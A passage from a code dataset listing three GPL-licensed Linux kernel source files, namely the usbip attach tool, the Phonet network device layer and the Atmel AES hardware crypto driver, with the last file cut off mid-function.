repo_name string | path string | copies string | size string | content string | license string |
|---|---|---|---|---|---|
f123h456/linux | tools/usb/usbip/src/usbip_attach.c | 1537 | 4876 | /*
* Copyright (C) 2011 matt mooney <mfm@muteddisk.com>
* 2005-2007 Takahiro Hirofuchi
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <sys/stat.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <getopt.h>
#include <unistd.h>
#include <errno.h>
#include "vhci_driver.h"
#include "usbip_common.h"
#include "usbip_network.h"
#include "usbip.h"
static const char usbip_attach_usage_string[] =
"usbip attach <args>\n"
" -r, --remote=<host> The machine with exported USB devices\n"
" -b, --busid=<busid> Busid of the device on <host>\n";
void usbip_attach_usage(void)
{
printf("usage: %s", usbip_attach_usage_string);
}
#define MAX_BUFF 100
static int record_connection(char *host, char *port, char *busid, int rhport)
{
int fd;
char path[PATH_MAX+1];
char buff[MAX_BUFF+1];
int ret;
ret = mkdir(VHCI_STATE_PATH, 0700);
if (ret < 0) {
/* if VHCI_STATE_PATH exists, then it better be a directory */
if (errno == EEXIST) {
struct stat s;
ret = stat(VHCI_STATE_PATH, &s);
if (ret < 0)
return -1;
if (!(s.st_mode & S_IFDIR))
return -1;
} else
return -1;
}
snprintf(path, PATH_MAX, VHCI_STATE_PATH"/port%d", rhport);
fd = open(path, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd < 0)
return -1;
snprintf(buff, MAX_BUFF, "%s %s %s\n",
host, port, busid);
ret = write(fd, buff, strlen(buff));
if (ret != (ssize_t) strlen(buff)) {
close(fd);
return -1;
}
close(fd);
return 0;
}
static int import_device(int sockfd, struct usbip_usb_device *udev)
{
int rc;
int port;
rc = usbip_vhci_driver_open();
if (rc < 0) {
err("open vhci_driver");
return -1;
}
port = usbip_vhci_get_free_port();
if (port < 0) {
err("no free port");
usbip_vhci_driver_close();
return -1;
}
rc = usbip_vhci_attach_device(port, sockfd, udev->busnum,
udev->devnum, udev->speed);
if (rc < 0) {
err("import device");
usbip_vhci_driver_close();
return -1;
}
usbip_vhci_driver_close();
return port;
}
static int query_import_device(int sockfd, char *busid)
{
int rc;
struct op_import_request request;
struct op_import_reply reply;
uint16_t code = OP_REP_IMPORT;
memset(&request, 0, sizeof(request));
memset(&reply, 0, sizeof(reply));
/* send a request */
rc = usbip_net_send_op_common(sockfd, OP_REQ_IMPORT, 0);
if (rc < 0) {
err("send op_common");
return -1;
}
strncpy(request.busid, busid, SYSFS_BUS_ID_SIZE-1);
PACK_OP_IMPORT_REQUEST(0, &request);
rc = usbip_net_send(sockfd, (void *) &request, sizeof(request));
if (rc < 0) {
err("send op_import_request");
return -1;
}
/* receive a reply */
rc = usbip_net_recv_op_common(sockfd, &code);
if (rc < 0) {
err("recv op_common");
return -1;
}
rc = usbip_net_recv(sockfd, (void *) &reply, sizeof(reply));
if (rc < 0) {
err("recv op_import_reply");
return -1;
}
PACK_OP_IMPORT_REPLY(0, &reply);
/* check the reply */
if (strncmp(reply.udev.busid, busid, SYSFS_BUS_ID_SIZE)) {
err("recv different busid %s", reply.udev.busid);
return -1;
}
/* import a device */
return import_device(sockfd, &reply.udev);
}
static int attach_device(char *host, char *busid)
{
int sockfd;
int rc;
int rhport;
sockfd = usbip_net_tcp_connect(host, usbip_port_string);
if (sockfd < 0) {
err("tcp connect");
return -1;
}
rhport = query_import_device(sockfd, busid);
if (rhport < 0) {
err("query");
return -1;
}
close(sockfd);
rc = record_connection(host, usbip_port_string, busid, rhport);
if (rc < 0) {
err("record connection");
return -1;
}
return 0;
}
int usbip_attach(int argc, char *argv[])
{
static const struct option opts[] = {
{ "remote", required_argument, NULL, 'r' },
{ "busid", required_argument, NULL, 'b' },
{ NULL, 0, NULL, 0 }
};
char *host = NULL;
char *busid = NULL;
int opt;
int ret = -1;
for (;;) {
opt = getopt_long(argc, argv, "r:b:", opts, NULL);
if (opt == -1)
break;
switch (opt) {
case 'r':
host = optarg;
break;
case 'b':
busid = optarg;
break;
default:
goto err_out;
}
}
if (!host || !busid)
goto err_out;
ret = attach_device(host, busid);
goto out;
err_out:
usbip_attach_usage();
out:
return ret;
}
| gpl-2.0 |
daishi4u/J7_Afterburner | net/phonet/pn_dev.c | 2049 | 10103 | /*
* File: pn_dev.c
*
* Phonet network device
*
* Copyright (C) 2008 Nokia Corporation.
*
* Authors: Sakari Ailus <sakari.ailus@nokia.com>
* Rémi Denis-Courmont
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*/
#include <linux/kernel.h>
#include <linux/net.h>
#include <linux/slab.h>
#include <linux/netdevice.h>
#include <linux/phonet.h>
#include <linux/proc_fs.h>
#include <linux/if_arp.h>
#include <net/sock.h>
#include <net/netns/generic.h>
#include <net/phonet/pn_dev.h>
struct phonet_routes {
struct mutex lock;
struct net_device *table[64];
};
struct phonet_net {
struct phonet_device_list pndevs;
struct phonet_routes routes;
};
static int phonet_net_id __read_mostly;
static struct phonet_net *phonet_pernet(struct net *net)
{
BUG_ON(!net);
return net_generic(net, phonet_net_id);
}
struct phonet_device_list *phonet_device_list(struct net *net)
{
struct phonet_net *pnn = phonet_pernet(net);
return &pnn->pndevs;
}
/* Allocate new Phonet device. */
static struct phonet_device *__phonet_device_alloc(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd = kmalloc(sizeof(*pnd), GFP_ATOMIC);
if (pnd == NULL)
return NULL;
pnd->netdev = dev;
bitmap_zero(pnd->addrs, 64);
BUG_ON(!mutex_is_locked(&pndevs->lock));
list_add_rcu(&pnd->list, &pndevs->list);
return pnd;
}
static struct phonet_device *__phonet_get(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
BUG_ON(!mutex_is_locked(&pndevs->lock));
list_for_each_entry(pnd, &pndevs->list, list) {
if (pnd->netdev == dev)
return pnd;
}
return NULL;
}
static struct phonet_device *__phonet_get_rcu(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
list_for_each_entry_rcu(pnd, &pndevs->list, list) {
if (pnd->netdev == dev)
return pnd;
}
return NULL;
}
static void phonet_device_destroy(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
ASSERT_RTNL();
mutex_lock(&pndevs->lock);
pnd = __phonet_get(dev);
if (pnd)
list_del_rcu(&pnd->list);
mutex_unlock(&pndevs->lock);
if (pnd) {
u8 addr;
for_each_set_bit(addr, pnd->addrs, 64)
phonet_address_notify(RTM_DELADDR, dev, addr);
kfree(pnd);
}
}
struct net_device *phonet_device_get(struct net *net)
{
struct phonet_device_list *pndevs = phonet_device_list(net);
struct phonet_device *pnd;
struct net_device *dev = NULL;
rcu_read_lock();
list_for_each_entry_rcu(pnd, &pndevs->list, list) {
dev = pnd->netdev;
BUG_ON(!dev);
if ((dev->reg_state == NETREG_REGISTERED) &&
((pnd->netdev->flags & IFF_UP)) == IFF_UP)
break;
dev = NULL;
}
if (dev)
dev_hold(dev);
rcu_read_unlock();
return dev;
}
int phonet_address_add(struct net_device *dev, u8 addr)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
int err = 0;
mutex_lock(&pndevs->lock);
/* Find or create Phonet-specific device data */
pnd = __phonet_get(dev);
if (pnd == NULL)
pnd = __phonet_device_alloc(dev);
if (unlikely(pnd == NULL))
err = -ENOMEM;
else if (test_and_set_bit(addr >> 2, pnd->addrs))
err = -EEXIST;
mutex_unlock(&pndevs->lock);
return err;
}
int phonet_address_del(struct net_device *dev, u8 addr)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
int err = 0;
mutex_lock(&pndevs->lock);
pnd = __phonet_get(dev);
if (!pnd || !test_and_clear_bit(addr >> 2, pnd->addrs)) {
err = -EADDRNOTAVAIL;
pnd = NULL;
} else if (bitmap_empty(pnd->addrs, 64))
list_del_rcu(&pnd->list);
else
pnd = NULL;
mutex_unlock(&pndevs->lock);
if (pnd)
kfree_rcu(pnd, rcu);
return err;
}
/* Gets a source address toward a destination, through a interface. */
u8 phonet_address_get(struct net_device *dev, u8 daddr)
{
struct phonet_device *pnd;
u8 saddr;
rcu_read_lock();
pnd = __phonet_get_rcu(dev);
if (pnd) {
BUG_ON(bitmap_empty(pnd->addrs, 64));
/* Use same source address as destination, if possible */
if (test_bit(daddr >> 2, pnd->addrs))
saddr = daddr;
else
saddr = find_first_bit(pnd->addrs, 64) << 2;
} else
saddr = PN_NO_ADDR;
rcu_read_unlock();
if (saddr == PN_NO_ADDR) {
/* Fallback to another device */
struct net_device *def_dev;
def_dev = phonet_device_get(dev_net(dev));
if (def_dev) {
if (def_dev != dev)
saddr = phonet_address_get(def_dev, daddr);
dev_put(def_dev);
}
}
return saddr;
}
int phonet_address_lookup(struct net *net, u8 addr)
{
struct phonet_device_list *pndevs = phonet_device_list(net);
struct phonet_device *pnd;
int err = -EADDRNOTAVAIL;
rcu_read_lock();
list_for_each_entry_rcu(pnd, &pndevs->list, list) {
/* Don't allow unregistering devices! */
if ((pnd->netdev->reg_state != NETREG_REGISTERED) ||
((pnd->netdev->flags & IFF_UP)) != IFF_UP)
continue;
if (test_bit(addr >> 2, pnd->addrs)) {
err = 0;
goto found;
}
}
found:
rcu_read_unlock();
return err;
}
/* automatically configure a Phonet device, if supported */
static int phonet_device_autoconf(struct net_device *dev)
{
struct if_phonet_req req;
int ret;
if (!dev->netdev_ops->ndo_do_ioctl)
return -EOPNOTSUPP;
ret = dev->netdev_ops->ndo_do_ioctl(dev, (struct ifreq *)&req,
SIOCPNGAUTOCONF);
if (ret < 0)
return ret;
ASSERT_RTNL();
ret = phonet_address_add(dev, req.ifr_phonet_autoconf.device);
if (ret)
return ret;
phonet_address_notify(RTM_NEWADDR, dev,
req.ifr_phonet_autoconf.device);
return 0;
}
static void phonet_route_autodel(struct net_device *dev)
{
struct phonet_net *pnn = phonet_pernet(dev_net(dev));
unsigned int i;
DECLARE_BITMAP(deleted, 64);
/* Remove left-over Phonet routes */
bitmap_zero(deleted, 64);
mutex_lock(&pnn->routes.lock);
for (i = 0; i < 64; i++)
if (dev == pnn->routes.table[i]) {
RCU_INIT_POINTER(pnn->routes.table[i], NULL);
set_bit(i, deleted);
}
mutex_unlock(&pnn->routes.lock);
if (bitmap_empty(deleted, 64))
return; /* short-circuit RCU */
synchronize_rcu();
for_each_set_bit(i, deleted, 64) {
rtm_phonet_notify(RTM_DELROUTE, dev, i);
dev_put(dev);
}
}
/* notify Phonet of device events */
static int phonet_device_notify(struct notifier_block *me, unsigned long what,
void *arg)
{
struct net_device *dev = arg;
switch (what) {
case NETDEV_REGISTER:
if (dev->type == ARPHRD_PHONET)
phonet_device_autoconf(dev);
break;
case NETDEV_UNREGISTER:
phonet_device_destroy(dev);
phonet_route_autodel(dev);
break;
}
return 0;
}
static struct notifier_block phonet_device_notifier = {
.notifier_call = phonet_device_notify,
.priority = 0,
};
/* Per-namespace Phonet devices handling */
static int __net_init phonet_init_net(struct net *net)
{
struct phonet_net *pnn = phonet_pernet(net);
if (!proc_create("phonet", 0, net->proc_net, &pn_sock_seq_fops))
return -ENOMEM;
INIT_LIST_HEAD(&pnn->pndevs.list);
mutex_init(&pnn->pndevs.lock);
mutex_init(&pnn->routes.lock);
return 0;
}
static void __net_exit phonet_exit_net(struct net *net)
{
remove_proc_entry("phonet", net->proc_net);
}
static struct pernet_operations phonet_net_ops = {
.init = phonet_init_net,
.exit = phonet_exit_net,
.id = &phonet_net_id,
.size = sizeof(struct phonet_net),
};
/* Initialize Phonet devices list */
int __init phonet_device_init(void)
{
int err = register_pernet_subsys(&phonet_net_ops);
if (err)
return err;
proc_create("pnresource", 0, init_net.proc_net, &pn_res_seq_fops);
register_netdevice_notifier(&phonet_device_notifier);
err = phonet_netlink_register();
if (err)
phonet_device_exit();
return err;
}
void phonet_device_exit(void)
{
rtnl_unregister_all(PF_PHONET);
unregister_netdevice_notifier(&phonet_device_notifier);
unregister_pernet_subsys(&phonet_net_ops);
remove_proc_entry("pnresource", init_net.proc_net);
}
int phonet_route_add(struct net_device *dev, u8 daddr)
{
struct phonet_net *pnn = phonet_pernet(dev_net(dev));
struct phonet_routes *routes = &pnn->routes;
int err = -EEXIST;
daddr = daddr >> 2;
mutex_lock(&routes->lock);
if (routes->table[daddr] == NULL) {
rcu_assign_pointer(routes->table[daddr], dev);
dev_hold(dev);
err = 0;
}
mutex_unlock(&routes->lock);
return err;
}
int phonet_route_del(struct net_device *dev, u8 daddr)
{
struct phonet_net *pnn = phonet_pernet(dev_net(dev));
struct phonet_routes *routes = &pnn->routes;
daddr = daddr >> 2;
mutex_lock(&routes->lock);
if (dev == routes->table[daddr])
RCU_INIT_POINTER(routes->table[daddr], NULL);
else
dev = NULL;
mutex_unlock(&routes->lock);
if (!dev)
return -ENOENT;
synchronize_rcu();
dev_put(dev);
return 0;
}
struct net_device *phonet_route_get_rcu(struct net *net, u8 daddr)
{
struct phonet_net *pnn = phonet_pernet(net);
struct phonet_routes *routes = &pnn->routes;
struct net_device *dev;
daddr >>= 2;
dev = rcu_dereference(routes->table[daddr]);
return dev;
}
struct net_device *phonet_route_output(struct net *net, u8 daddr)
{
struct phonet_net *pnn = phonet_pernet(net);
struct phonet_routes *routes = &pnn->routes;
struct net_device *dev;
daddr >>= 2;
rcu_read_lock();
dev = rcu_dereference(routes->table[daddr]);
if (dev)
dev_hold(dev);
rcu_read_unlock();
if (!dev)
dev = phonet_device_get(net); /* Default route */
return dev;
}
| gpl-2.0 |
maxwen/android_kernel_oppo_msm8916_orig | drivers/crypto/atmel-aes.c | 2305 | 34345 | /*
* Cryptographic API.
*
* Support for ATMEL AES HW acceleration.
*
* Copyright (c) 2012 Eukréa Electromatique - ATMEL
* Author: Nicolas Royer <nicolas@eukrea.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
* Some ideas are from omap-aes.c driver.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/err.h>
#include <linux/clk.h>
#include <linux/io.h>
#include <linux/hw_random.h>
#include <linux/platform_device.h>
#include <linux/device.h>
#include <linux/init.h>
#include <linux/errno.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/scatterlist.h>
#include <linux/dma-mapping.h>
#include <linux/delay.h>
#include <linux/crypto.h>
#include <linux/cryptohash.h>
#include <crypto/scatterwalk.h>
#include <crypto/algapi.h>
#include <crypto/aes.h>
#include <crypto/hash.h>
#include <crypto/internal/hash.h>
#include <linux/platform_data/crypto-atmel.h>
#include "atmel-aes-regs.h"
#define CFB8_BLOCK_SIZE 1
#define CFB16_BLOCK_SIZE 2
#define CFB32_BLOCK_SIZE 4
#define CFB64_BLOCK_SIZE 8
/* AES flags */
#define AES_FLAGS_MODE_MASK 0x03ff
#define AES_FLAGS_ENCRYPT BIT(0)
#define AES_FLAGS_CBC BIT(1)
#define AES_FLAGS_CFB BIT(2)
#define AES_FLAGS_CFB8 BIT(3)
#define AES_FLAGS_CFB16 BIT(4)
#define AES_FLAGS_CFB32 BIT(5)
#define AES_FLAGS_CFB64 BIT(6)
#define AES_FLAGS_CFB128 BIT(7)
#define AES_FLAGS_OFB BIT(8)
#define AES_FLAGS_CTR BIT(9)
#define AES_FLAGS_INIT BIT(16)
#define AES_FLAGS_DMA BIT(17)
#define AES_FLAGS_BUSY BIT(18)
#define AES_FLAGS_FAST BIT(19)
#define ATMEL_AES_QUEUE_LENGTH 50
#define ATMEL_AES_DMA_THRESHOLD 16
struct atmel_aes_caps {
bool has_dualbuff;
bool has_cfb64;
u32 max_burst_size;
};
struct atmel_aes_dev;
struct atmel_aes_ctx {
struct atmel_aes_dev *dd;
int keylen;
u32 key[AES_KEYSIZE_256 / sizeof(u32)];
u16 block_size;
};
struct atmel_aes_reqctx {
unsigned long mode;
};
struct atmel_aes_dma {
struct dma_chan *chan;
struct dma_slave_config dma_conf;
};
struct atmel_aes_dev {
struct list_head list;
unsigned long phys_base;
void __iomem *io_base;
struct atmel_aes_ctx *ctx;
struct device *dev;
struct clk *iclk;
int irq;
unsigned long flags;
int err;
spinlock_t lock;
struct crypto_queue queue;
struct tasklet_struct done_task;
struct tasklet_struct queue_task;
struct ablkcipher_request *req;
size_t total;
struct scatterlist *in_sg;
unsigned int nb_in_sg;
size_t in_offset;
struct scatterlist *out_sg;
unsigned int nb_out_sg;
size_t out_offset;
size_t bufcnt;
size_t buflen;
size_t dma_size;
void *buf_in;
int dma_in;
dma_addr_t dma_addr_in;
struct atmel_aes_dma dma_lch_in;
void *buf_out;
int dma_out;
dma_addr_t dma_addr_out;
struct atmel_aes_dma dma_lch_out;
struct atmel_aes_caps caps;
u32 hw_version;
};
struct atmel_aes_drv {
struct list_head dev_list;
spinlock_t lock;
};
static struct atmel_aes_drv atmel_aes = {
.dev_list = LIST_HEAD_INIT(atmel_aes.dev_list),
.lock = __SPIN_LOCK_UNLOCKED(atmel_aes.lock),
};
static int atmel_aes_sg_length(struct ablkcipher_request *req,
struct scatterlist *sg)
{
unsigned int total = req->nbytes;
int sg_nb;
unsigned int len;
struct scatterlist *sg_list;
sg_nb = 0;
sg_list = sg;
total = req->nbytes;
while (total) {
len = min(sg_list->length, total);
sg_nb++;
total -= len;
sg_list = sg_next(sg_list);
if (!sg_list)
total = 0;
}
return sg_nb;
}
static int atmel_aes_sg_copy(struct scatterlist **sg, size_t *offset,
void *buf, size_t buflen, size_t total, int out)
{
unsigned int count, off = 0;
while (buflen && total) {
count = min((*sg)->length - *offset, total);
count = min(count, buflen);
if (!count)
return off;
scatterwalk_map_and_copy(buf + off, *sg, *offset, count, out);
off += count;
buflen -= count;
*offset += count;
total -= count;
if (*offset == (*sg)->length) {
*sg = sg_next(*sg);
if (*sg)
*offset = 0;
else
total = 0;
}
}
return off;
}
static inline u32 atmel_aes_read(struct atmel_aes_dev *dd, u32 offset)
{
return readl_relaxed(dd->io_base + offset);
}
static inline void atmel_aes_write(struct atmel_aes_dev *dd,
u32 offset, u32 value)
{
writel_relaxed(value, dd->io_base + offset);
}
static void atmel_aes_read_n(struct atmel_aes_dev *dd, u32 offset,
u32 *value, int count)
{
for (; count--; value++, offset += 4)
*value = atmel_aes_read(dd, offset);
}
static void atmel_aes_write_n(struct atmel_aes_dev *dd, u32 offset,
u32 *value, int count)
{
for (; count--; value++, offset += 4)
atmel_aes_write(dd, offset, *value);
}
static struct atmel_aes_dev *atmel_aes_find_dev(struct atmel_aes_ctx *ctx)
{
struct atmel_aes_dev *aes_dd = NULL;
struct atmel_aes_dev *tmp;
spin_lock_bh(&atmel_aes.lock);
if (!ctx->dd) {
list_for_each_entry(tmp, &atmel_aes.dev_list, list) {
aes_dd = tmp;
break;
}
ctx->dd = aes_dd;
} else {
aes_dd = ctx->dd;
}
spin_unlock_bh(&atmel_aes.lock);
return aes_dd;
}
static int atmel_aes_hw_init(struct atmel_aes_dev *dd)
{
clk_prepare_enable(dd->iclk);
if (!(dd->flags & AES_FLAGS_INIT)) {
atmel_aes_write(dd, AES_CR, AES_CR_SWRST);
atmel_aes_write(dd, AES_MR, 0xE << AES_MR_CKEY_OFFSET);
dd->flags |= AES_FLAGS_INIT;
dd->err = 0;
}
return 0;
}
static inline unsigned int atmel_aes_get_version(struct atmel_aes_dev *dd)
{
return atmel_aes_read(dd, AES_HW_VERSION) & 0x00000fff;
}
static void atmel_aes_hw_version_init(struct atmel_aes_dev *dd)
{
atmel_aes_hw_init(dd);
dd->hw_version = atmel_aes_get_version(dd);
dev_info(dd->dev,
"version: 0x%x\n", dd->hw_version);
clk_disable_unprepare(dd->iclk);
}
static void atmel_aes_finish_req(struct atmel_aes_dev *dd, int err)
{
struct ablkcipher_request *req = dd->req;
clk_disable_unprepare(dd->iclk);
dd->flags &= ~AES_FLAGS_BUSY;
req->base.complete(&req->base, err);
}
static void atmel_aes_dma_callback(void *data)
{
struct atmel_aes_dev *dd = data;
/* dma_lch_out - completed */
tasklet_schedule(&dd->done_task);
}
static int atmel_aes_crypt_dma(struct atmel_aes_dev *dd,
dma_addr_t dma_addr_in, dma_addr_t dma_addr_out, int length)
{
struct scatterlist sg[2];
struct dma_async_tx_descriptor *in_desc, *out_desc;
dd->dma_size = length;
if (!(dd->flags & AES_FLAGS_FAST)) {
dma_sync_single_for_device(dd->dev, dma_addr_in, length,
DMA_TO_DEVICE);
}
if (dd->flags & AES_FLAGS_CFB8) {
dd->dma_lch_in.dma_conf.dst_addr_width =
DMA_SLAVE_BUSWIDTH_1_BYTE;
dd->dma_lch_out.dma_conf.src_addr_width =
DMA_SLAVE_BUSWIDTH_1_BYTE;
} else if (dd->flags & AES_FLAGS_CFB16) {
dd->dma_lch_in.dma_conf.dst_addr_width =
DMA_SLAVE_BUSWIDTH_2_BYTES;
dd->dma_lch_out.dma_conf.src_addr_width =
DMA_SLAVE_BUSWIDTH_2_BYTES;
} else {
dd->dma_lch_in.dma_conf.dst_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
dd->dma_lch_out.dma_conf.src_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
}
if (dd->flags & (AES_FLAGS_CFB8 | AES_FLAGS_CFB16 |
AES_FLAGS_CFB32 | AES_FLAGS_CFB64)) {
dd->dma_lch_in.dma_conf.src_maxburst = 1;
dd->dma_lch_in.dma_conf.dst_maxburst = 1;
dd->dma_lch_out.dma_conf.src_maxburst = 1;
dd->dma_lch_out.dma_conf.dst_maxburst = 1;
} else {
dd->dma_lch_in.dma_conf.src_maxburst = dd->caps.max_burst_size;
dd->dma_lch_in.dma_conf.dst_maxburst = dd->caps.max_burst_size;
dd->dma_lch_out.dma_conf.src_maxburst = dd->caps.max_burst_size;
dd->dma_lch_out.dma_conf.dst_maxburst = dd->caps.max_burst_size;
}
dmaengine_slave_config(dd->dma_lch_in.chan, &dd->dma_lch_in.dma_conf);
dmaengine_slave_config(dd->dma_lch_out.chan, &dd->dma_lch_out.dma_conf);
dd->flags |= AES_FLAGS_DMA;
sg_init_table(&sg[0], 1);
sg_dma_address(&sg[0]) = dma_addr_in;
sg_dma_len(&sg[0]) = length;
sg_init_table(&sg[1], 1);
sg_dma_address(&sg[1]) = dma_addr_out;
sg_dma_len(&sg[1]) = length;
in_desc = dmaengine_prep_slave_sg(dd->dma_lch_in.chan, &sg[0],
1, DMA_MEM_TO_DEV,
DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
if (!in_desc)
return -EINVAL;
out_desc = dmaengine_prep_slave_sg(dd->dma_lch_out.chan, &sg[1],
1, DMA_DEV_TO_MEM,
DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
if (!out_desc)
return -EINVAL;
out_desc->callback = atmel_aes_dma_callback;
out_desc->callback_param = dd;
dmaengine_submit(out_desc);
dma_async_issue_pending(dd->dma_lch_out.chan);
dmaengine_submit(in_desc);
dma_async_issue_pending(dd->dma_lch_in.chan);
return 0;
}
static int atmel_aes_crypt_cpu_start(struct atmel_aes_dev *dd)
{
dd->flags &= ~AES_FLAGS_DMA;
/* use cache buffers */
dd->nb_in_sg = atmel_aes_sg_length(dd->req, dd->in_sg);
if (!dd->nb_in_sg)
return -EINVAL;
dd->nb_out_sg = atmel_aes_sg_length(dd->req, dd->out_sg);
if (!dd->nb_out_sg)
return -EINVAL;
dd->bufcnt = sg_copy_to_buffer(dd->in_sg, dd->nb_in_sg,
dd->buf_in, dd->total);
if (!dd->bufcnt)
return -EINVAL;
dd->total -= dd->bufcnt;
atmel_aes_write(dd, AES_IER, AES_INT_DATARDY);
atmel_aes_write_n(dd, AES_IDATAR(0), (u32 *) dd->buf_in,
dd->bufcnt >> 2);
return 0;
}
static int atmel_aes_crypt_dma_start(struct atmel_aes_dev *dd)
{
int err, fast = 0, in, out;
size_t count;
dma_addr_t addr_in, addr_out;
if ((!dd->in_offset) && (!dd->out_offset)) {
/* check for alignment */
in = IS_ALIGNED((u32)dd->in_sg->offset, sizeof(u32)) &&
IS_ALIGNED(dd->in_sg->length, dd->ctx->block_size);
out = IS_ALIGNED((u32)dd->out_sg->offset, sizeof(u32)) &&
IS_ALIGNED(dd->out_sg->length, dd->ctx->block_size);
fast = in && out;
if (sg_dma_len(dd->in_sg) != sg_dma_len(dd->out_sg))
fast = 0;
}
if (fast) {
count = min(dd->total, sg_dma_len(dd->in_sg));
count = min(count, sg_dma_len(dd->out_sg));
err = dma_map_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
if (!err) {
dev_err(dd->dev, "dma_map_sg() error\n");
return -EINVAL;
}
err = dma_map_sg(dd->dev, dd->out_sg, 1,
DMA_FROM_DEVICE);
if (!err) {
dev_err(dd->dev, "dma_map_sg() error\n");
dma_unmap_sg(dd->dev, dd->in_sg, 1,
DMA_TO_DEVICE);
return -EINVAL;
}
addr_in = sg_dma_address(dd->in_sg);
addr_out = sg_dma_address(dd->out_sg);
dd->flags |= AES_FLAGS_FAST;
} else {
/* use cache buffers */
count = atmel_aes_sg_copy(&dd->in_sg, &dd->in_offset,
dd->buf_in, dd->buflen, dd->total, 0);
addr_in = dd->dma_addr_in;
addr_out = dd->dma_addr_out;
dd->flags &= ~AES_FLAGS_FAST;
}
dd->total -= count;
err = atmel_aes_crypt_dma(dd, addr_in, addr_out, count);
if (err && (dd->flags & AES_FLAGS_FAST)) {
dma_unmap_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
dma_unmap_sg(dd->dev, dd->out_sg, 1, DMA_TO_DEVICE);
}
return err;
}
static int atmel_aes_write_ctrl(struct atmel_aes_dev *dd)
{
int err;
u32 valcr = 0, valmr = 0;
err = atmel_aes_hw_init(dd);
if (err)
return err;
/* MR register must be set before IV registers */
if (dd->ctx->keylen == AES_KEYSIZE_128)
valmr |= AES_MR_KEYSIZE_128;
else if (dd->ctx->keylen == AES_KEYSIZE_192)
valmr |= AES_MR_KEYSIZE_192;
else
valmr |= AES_MR_KEYSIZE_256;
if (dd->flags & AES_FLAGS_CBC) {
valmr |= AES_MR_OPMOD_CBC;
} else if (dd->flags & AES_FLAGS_CFB) {
valmr |= AES_MR_OPMOD_CFB;
if (dd->flags & AES_FLAGS_CFB8)
valmr |= AES_MR_CFBS_8b;
else if (dd->flags & AES_FLAGS_CFB16)
valmr |= AES_MR_CFBS_16b;
else if (dd->flags & AES_FLAGS_CFB32)
valmr |= AES_MR_CFBS_32b;
else if (dd->flags & AES_FLAGS_CFB64)
valmr |= AES_MR_CFBS_64b;
else if (dd->flags & AES_FLAGS_CFB128)
valmr |= AES_MR_CFBS_128b;
} else if (dd->flags & AES_FLAGS_OFB) {
valmr |= AES_MR_OPMOD_OFB;
} else if (dd->flags & AES_FLAGS_CTR) {
valmr |= AES_MR_OPMOD_CTR;
} else {
valmr |= AES_MR_OPMOD_ECB;
}
if (dd->flags & AES_FLAGS_ENCRYPT)
valmr |= AES_MR_CYPHER_ENC;
if (dd->total > ATMEL_AES_DMA_THRESHOLD) {
valmr |= AES_MR_SMOD_IDATAR0;
if (dd->caps.has_dualbuff)
valmr |= AES_MR_DUALBUFF;
} else {
valmr |= AES_MR_SMOD_AUTO;
}
atmel_aes_write(dd, AES_CR, valcr);
atmel_aes_write(dd, AES_MR, valmr);
atmel_aes_write_n(dd, AES_KEYWR(0), dd->ctx->key,
dd->ctx->keylen >> 2);
if (((dd->flags & AES_FLAGS_CBC) || (dd->flags & AES_FLAGS_CFB) ||
(dd->flags & AES_FLAGS_OFB) || (dd->flags & AES_FLAGS_CTR)) &&
dd->req->info) {
atmel_aes_write_n(dd, AES_IVR(0), dd->req->info, 4);
}
return 0;
}
static int atmel_aes_handle_queue(struct atmel_aes_dev *dd,
struct ablkcipher_request *req)
{
struct crypto_async_request *async_req, *backlog;
struct atmel_aes_ctx *ctx;
struct atmel_aes_reqctx *rctx;
unsigned long flags;
int err, ret = 0;
spin_lock_irqsave(&dd->lock, flags);
if (req)
ret = ablkcipher_enqueue_request(&dd->queue, req);
if (dd->flags & AES_FLAGS_BUSY) {
spin_unlock_irqrestore(&dd->lock, flags);
return ret;
}
backlog = crypto_get_backlog(&dd->queue);
async_req = crypto_dequeue_request(&dd->queue);
if (async_req)
dd->flags |= AES_FLAGS_BUSY;
spin_unlock_irqrestore(&dd->lock, flags);
if (!async_req)
return ret;
if (backlog)
backlog->complete(backlog, -EINPROGRESS);
req = ablkcipher_request_cast(async_req);
/* assign new request to device */
dd->req = req;
dd->total = req->nbytes;
dd->in_offset = 0;
dd->in_sg = req->src;
dd->out_offset = 0;
dd->out_sg = req->dst;
rctx = ablkcipher_request_ctx(req);
ctx = crypto_ablkcipher_ctx(crypto_ablkcipher_reqtfm(req));
